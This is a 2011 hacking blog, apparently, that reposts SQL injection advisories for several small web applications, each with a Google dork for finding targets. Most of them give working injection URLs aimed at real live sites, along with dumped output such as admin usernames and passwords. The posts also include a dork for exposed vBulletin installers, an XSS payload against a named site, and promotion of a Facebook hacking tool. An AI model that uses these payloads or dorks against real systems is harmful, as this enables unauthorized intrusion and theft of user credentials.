http://www.mohackz.com/
this guy has some real sh!t going
Sunday, May 29, 2011
Alot of useful software for hacking
All his software has coded by him
http://reiluke.i.ph/
goto this site, he has alot of nice software and tools don't leech
http://reiluke.i.ph/
goto this site, he has alot of nice software and tools don't leech
All in One Tools & Tutorials
http://www.hackforums.net/archive/index.php/thread-1141587-1.html
goto the link learn to hack by watching and doing it your self.
goto the link learn to hack by watching and doing it your self.
Saturday, May 28, 2011
Q8Portals SQL Injection Vulnerability
========================================================================= Q8portals [asp] SQL Injection Vulnerability ========================================================================== [+]Title :.......Q8portals [asp] SQL Injection Vulnerability [+]Author :......Net.Edit0r [+]Tested on :...Win Xp Sp 2/3 [~]Data :.............2011-05-13 --------------------------------------------------------------------------- [~] Founded by Net.Edit0r [~] Team: Black Hat Group [~] Contact: Black.hat.tm@Gmail.Com [~] Home: http://Black-HG.Org & http://Security-War.Com [~] Vendor: http://www.Q8portals.com [~] Category:: [webapps] ==========ExPl0iT3d by Net.Edit0r========== [+] DORK: intext:Powered by: q8portals.com [+] Description: You start using the command having 1 = 1 - name of first table to find And more using the command (order by )other name you will find tables [ I ]. SQL Vulnerability +=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [+++] Important: For Sql Injection easily program such Havij and use Hmei7 [P0C]: http://127.0.0.1/portal/articles_en.asp?id= [ SQL INJECTION] [P0C]: http://127.0.0.1/portal/contents_en.asp?id=4 [ SQL INJECTION] [L!v3 D3m0's]: http://www.alowaidhoney.com/portal/articles_en.asp?id=-4%20group+by+ARTICLES.ARTICLE_ID,ARTICLES.ARTICLE_TITLE_AR,ARTICLES.ARTICLE_DESC_AR+having%201=1-- http://alghanimkw.com/portal/contents_en.asp?id=4%20group+by+CONTENTS.CONTENT_ID,CONTENTS.CONTENT_NAME_AR,CONTENTS.CONTENT_DESC_AR-- [+] TIME TABLE: 12 May 2011 - Vulnerability discovered. 13 May 2011 - Advisory released. =========================================================================================== [!] Black Hat Group ./Iranian HackerZ =========================================================================================== [!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net =========================================================================================== [!] Greetz To : DarkCoder | p3nt3st3r | Amir-MaGiC | 3H34N | H3x | D3adlY & All Iranian HackerZ =========================================================================================== [!] Spec Th4nks: HUrr!c4nE | Virangar | B3hz4d | M4Hd1 | Mr.Xhat | Immortal Boy | __SENATOR__ | And All My Friendz =========================================================================================== [!] Persian Gulf 4 Ever $CENSORD$ ===========================================================================================
Trade Line Web SQLi Vulnerability
Trade Line Web <= Remote 'id' Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KnocKout member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
Special greetz to : and Endonesian Backtrack Team - 0nto.me|09exploit.com
My inj3ct0r Brothers.:)
r0073r (~) Sid3^effectS (~) r4dc0re (~) Indoushka (~) eXeSoul (~) eidelweiss (~) SeeMe (~)
XroGuE (~) agix (~) KedAns-Dz (~) gunslinger_ (~) Sn!pEr.S!Te (~) ZoRLu (~) anT!-Tr0J4n
--------------------------------------------------------
Note:' i Need botnet Owner friend! '
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Trade Line Web
|~Price : N/A
|~Version : N/A
|~Software: http://www.tradelineweb.com/
|~Vulnerability Style : SQL INJECTION
|~Vulnerability Dir : /
|~Google Keyword : "Trade Line Web" inurl:detay.php
|[~]Date : "19.05.2011"
|[~]Tested on :
DEMOS
----------------------------------------------------------
urunler.php <= 'ID' Functions Not Security
detay.php <= 'ID' Functions Not Security
---------------------------------------------------------
Example| Exploitation
SQL Injecting..
Target : http://www.chickenstrade.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x7573657273&tur=urun
Mysql Writes: id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan,id,username,password,domain,email,adres,tel1,tel2,tel3,style,hakkimizda,logo,site_baslik,slogan
Hm... ok.
SQL Injecting..
Target : http://www.parkdijital.com/urunler.php?kat_id=8%20and%201=1%20union%20select%201,group_concat%28id,0x3a,username,0x3a,password%29,3,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1
Mysql Writes: 1:admin:12345
Hmm... ok.
SQL Injecting..
Target : http://www.kececigroup.com/detay.php?id=-288%20and%201=1%20union%20select%201,2,@@version,4,5,6,7,8,9,10,11%20from%20users%20where%20id=1&tur=urun
Mysql Writes : 5.0.90
================================================================
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Was Here. HTTP://H4X0RESEC.BLOGSOT.COM
Web Design by ChromeMedia Exploit
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm kalashinkov3 member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################### # Title : ChromeMedia SQL Injection Vulnerability # Author: Kalashinkov3 # Vendor: [www.chromemedia.com] # Email : kalashinkov3[at]Hotmail[dot].Fr # Date : 22/05/2011 # Google Dork : intext:"Web Design by ChromeMedia Inc" inurl:*.php? # Category : PHP [SQli] ######################################################### *_Exploit_* # http://[localhost]/*/*/article.php?content_id='22 # http://[localhost]/*/*/article.php?content_id=[SQLI] # http://[localhost]/*/*/details.php?product_id='20 # http://[localhost]/*/*/details.php?product_id=[SQLI] # all php files "*.php?*_id= " are vulnerable # ^_^ G00d LUCK ALL :=) ========================================================================= # Greets To : BrOx-dz & all Algerians Hacker'S ;) & All mmembre 1337Day # =========================================================================
Friday, May 27, 2011
frame-oshop Sqli vuln
product: frame-oshopvendor: http://www.sdaxx.de/ |
date: 15.05.2011 |
status: 0day |
version: i dunno... |
PoC: http://www.host.com/shop/main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12 |
Dork: "2006 by Sdaxx Rostock" intitle:"frame-oshop" |
Note: -sessid had to be fresh |
-there are more vuln... |
>>published by -SmoG- on SceneGround.info<< |
gretz to my mentor Therion, c0x and other sg-members!
SQL Injection MySchool Version 7.02
################################################## # Google Dork: "MySchool Version 7.02" |
# Date: 05-21-2011 |
# Software Link: http://em.com.eg/ |
# Version: Version 7.02 |
# Author: az7rb |
# Tested on : winxp sp3 Ar end bt5 |
# Homepage : www.p0c.cc |
# Greetz : p0c Team & Dr.NaNo & All My Msn Messenger Friends |
################################################## |
################################################## |
#################### wWw.p0c.cc ##################### |
################################################## |
# SQL : |
# |
http://localhost/myschool/index.php?do=show_details&ID=[sql] |
# Example : |
# |
http://localhost/myschool/index.php?do=show_details&ID=29' |
# SQL 2 : |
# |
http://localhost/myschool/show_page.php?Page_ID=[sql] |
# Example : |
# |
http://localhost/myschool/show_page.php?Page_ID=&table=users' |
# Link Control Panel : |
http://localhost/myschool/login.php |
##################################################
HB Ecommerce SQL Injection [Exploit0Db]
-------------[ HB ECOMMERCE SQL Injection Vulnerability ]--------------------------------------------------------------------------------------- |
------------------------------------------------------------------------ |
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ] |
[+] Google Dork: intext:'supplied by hb ecommerce' |
[+] Date: 26.05.2011 |
[+] Author: takeshix |
[+] Author Contact: takeshix@safe-mail.net |
[+] Software Link: http://www.hbecommerce.co.uk/ |
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64 |
[+] System: PHP |
------------------------------------------------------------------------ |
------------------------------------------------------------------------ |
vulnerable url: |
/templates1/view_product.php?product=3D |
Example: |
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION] |
Get an Mail from the Customers Table: |
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL= |
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%= |
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2= |
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2= |
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%= |
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2= |
9a%29%20 |
note: customer passwords dumped in plaintext! |
------------------------------------------------------------------------ |
------------------------------------------------------------------------ |
Greez to: esc0bar | Someone | takedown |
------------------------------------------------------------------------ |
------------------------------------------------------------------------ |
--------------------------[ hacktivistas ]------------------------------
vBulletin Installion Untreated
inurl:/install/install.php intitle:vBulletin * Install System
search this dork at www.google.com
this dork finds vulnerable vBulletin installion in some servers
have fun finding servers ;).
search this dork at www.google.com
this dork finds vulnerable vBulletin installion in some servers
have fun finding servers ;).
Sunday, May 22, 2011
Heres nice milw0rm backup by me at co.cc
Milworm heres the link, and find all the exploits that you need ;)
Sunday, May 8, 2011
How to Install BackTrack full guide
Ok, starters this 'guide' will help you know what todo
make an live cd or usb (make sure your computer supports it or use the cd)
NOTE: If your using an netbook its possible that it has usb support
So. when it boots select your options, then you will get an terminal fullscreen wait until prompter come up it will have root and the underscore blinking. OK heres part that people start to get confused at. there will say WTF its not backtrack it must been an fake, ITS NOT type startx then the GUI will come-up.
Hopes to everyone.
make an live cd or usb (make sure your computer supports it or use the cd)
NOTE: If your using an netbook its possible that it has usb support
So. when it boots select your options, then you will get an terminal fullscreen wait until prompter come up it will have root and the underscore blinking. OK heres part that people start to get confused at. there will say WTF its not backtrack it must been an fake, ITS NOT type startx then the GUI will come-up.
Hopes to everyone.
Monday, May 2, 2011
Getting Metasploit for my ubuntu
Why I tell you this, is because I can post my own Exploit & Vulnerabilies quicker than just searching & posting updates, though I do have my own list later on I will do so.
pakistani.pk XSS vuln
http://pakistani.pk/?s=%22%3E%3Cscript%3Ealert%28%22Hini%20Aes,%20owned%20here%22%29%3C/script%3E
Official Pakistani site has an XSS vulnerability.
Official Pakistani site has an XSS vulnerability.
Facebook XML Vulnerabiliry & maybe XSS
Vulnerable Link :
http://www.facebook.com/
Here some more Links, You should Analyse :
http://www.facebook.com/
http://vthumb.ak.fbcdn.net/
http://static.ak.fbcdn.net/
http://static.ak.fbcdn.net/
http://static.ak.fbcdn.net/
http://static.ak.fbcdn.net/
http://www.facebook.com/
Here some more Links, You should Analyse :
http://www.facebook.com/
http://vthumb.ak.fbcdn.net/
http://static.ak.fbcdn.net/
http://static.ak.fbcdn.net/
http://static.ak.fbcdn.net/
http://static.ak.fbcdn.net/
Sunday, May 1, 2011
Join me in facebook | macrocrack group
http://www.facebook.com/profile.php?id=100002121514878
Join Macrocrack Soft.
| Osama Bin Liden is now dead |
----------------------------------------------------
I will be posting facebook vulns later on, may take me some time to find so....
Join Macrocrack Soft.
| Osama Bin Liden is now dead |
----------------------------------------------------
I will be posting facebook vulns later on, may take me some time to find so....
Is facebook vulnerable in web applications
Yes, facebook is very vulnerable to an 'Med' level attack, so far im going to scan again because I just got an new OS installed (ubuntu netbook edition).
Rootbook the best facebook hacking utility in hacking.
Rootbook the best win32/ubuntu32 (Python-Based) facebook hacking application on the internet.
Release Beta0 will be out soon.
Release Beta0 will be out soon.
Subscribe to:
Posts (Atom)